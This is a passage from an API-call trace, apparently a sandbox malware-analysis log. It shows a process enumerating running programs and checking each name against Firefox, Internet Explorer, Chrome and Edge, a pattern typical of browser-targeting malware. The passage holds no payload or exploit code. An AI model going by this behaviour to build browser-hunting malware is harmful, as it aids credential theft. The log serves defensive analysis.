dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.907] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0175.907] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0175.907] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0175.907] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.907] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0175.908] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0175.908] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0175.908] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0175.908] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0175.908] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0175.908] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0175.908] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0175.908] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0175.908] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.908] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0175.909] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0175.909] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0175.909] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0175.909] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.909] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.909] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0175.909] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0175.909] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0175.909] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.909] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0175.910] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0175.910] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0175.910] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0175.910] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.910] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0175.911] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0175.911] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0175.911] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0175.911] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0175.911] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0175.911] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0175.911] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0175.911] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0175.911] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0175.911] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0175.912] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0175.912] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0175.912] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0175.912] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.912] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0175.913] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0175.913] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0175.913] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0175.913] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0175.913] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0175.913] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0175.913] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0175.913] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0175.913] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0175.913] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0175.914] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0175.914] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0175.914] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0175.914] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.914] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0175.914] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0175.914] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0175.914] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0175.914] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.914] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0175.915] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0175.915] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0175.915] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0175.915] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.915] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0175.915] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0175.915] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0175.915] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0175.915] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.915] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0175.916] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0175.916] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0175.916] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0175.916] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0175.916] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0175.917] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0175.917] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0175.917] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0175.917] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.917] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0175.917] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0175.917] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0175.917] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0175.917] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.917] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0175.918] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0175.918] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0175.918] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0175.918] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.918] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0175.918] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0175.918] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0175.918] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0175.918] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.918] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0175.919] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0175.919] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0175.919] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0175.919] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.919] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0175.919] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0175.919] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0175.919] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0175.919] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0175.919] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0175.920] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0175.920] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0175.920] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0175.920] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0175.920] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0175.920] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0175.921] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0175.921] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0175.921] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0175.921] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0175.921] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0175.921] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0175.921] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0175.921] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.921] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0175.922] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0175.922] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0175.922] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0175.922] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0175.922] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0175.922] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0175.922] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0175.922] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0175.922] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.922] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0175.923] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0175.923] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0175.923] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0175.923] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.923] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.923] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0175.923] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0175.923] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0175.923] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.923] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0175.924] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0175.924] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0175.924] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0175.924] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.924] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.925] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0175.925] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0175.925] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0175.925] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.925] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0175.925] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0175.925] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0175.925] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0175.925] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.925] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.926] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0175.926] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0175.926] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0175.926] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.926] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0175.926] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0175.926] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0175.926] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0175.926] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0175.926] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0175.927] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0175.927] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0175.927] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0175.927] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.927] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0175.927] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0175.927] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0175.927] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0175.927] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.928] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0175.928] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0175.928] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0175.928] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0175.928] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0175.928] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0175.929] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0175.929] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0175.929] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0175.929] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0175.929] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0175.929] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0175.929] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0175.929] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0175.929] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0175.929] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0176.039] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0176.039] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0176.039] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0176.039] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0176.039] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x790, pcPriClassBase=6, dwFlags=0x0, szExeFile="regsvr32.exe")) returned 1 [0176.040] lstrcmpiA (lpString1="regsvr32.exe", lpString2="firefox.exe") returned 1 [0176.040] lstrcmpiA (lpString1="regsvr32.exe", lpString2="iexplore.exe") returned 1 [0176.040] lstrcmpiA (lpString1="regsvr32.exe", 